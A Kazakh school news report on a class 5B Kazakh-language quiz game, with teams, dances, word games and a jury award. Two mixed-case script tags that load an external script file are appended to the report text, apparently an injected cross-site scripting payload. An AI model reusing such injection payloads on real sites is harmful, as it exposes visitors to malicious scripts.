3 ақпан күні сағат 16.00-де «Жалтыр ауылының №3 ЖОББМ» КММ-нде 5Б сыныбында Ж.Сейтжанованың ұйымдастыруымен "МЕН ҚАЗАҚ ТІЛІН БІЛЕМІН" атты зияткерлік ойын өтті. Мақсаты: Өзге ұлт өкілдері балаларын қазақ тілінде таза сөйлеуге баулу. Мемлекеттік тілге деген сүйіспеншіліктерін жетілдіру. Патриоттыққа және ізгі мәдениеттілікке тәрбиелеу. Оқушылар «Арман», «Қыран» тобы болып сайысты. Мың бұралып қазақтың «Қара жорға» биін билеп, зейіндерін шоғарландырып, сөз жарысын бастады. Ойын барысында өздерін таныстырып, ұрандарын айтты. Кейін байлық түрлерін топтастырып, сөздердің ұйқасын тапты, ұзын сөздерден сөздер құрады. Бәрі белсене қатысты. Көрермендермен «Суретті мақал-мәтелдерді табыңдар» атты ойын өтті, одан Байжигитов Алдияр жеңді. Қазылар алқасының төрайымы М.Дюсембаева болып, Жеңіс додасын жігіттерден құралған «Арман» тобына берді<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

04.02.2025
Просмотров: 10489


Пікір қосу



Деректерді қолтаңбаға қосу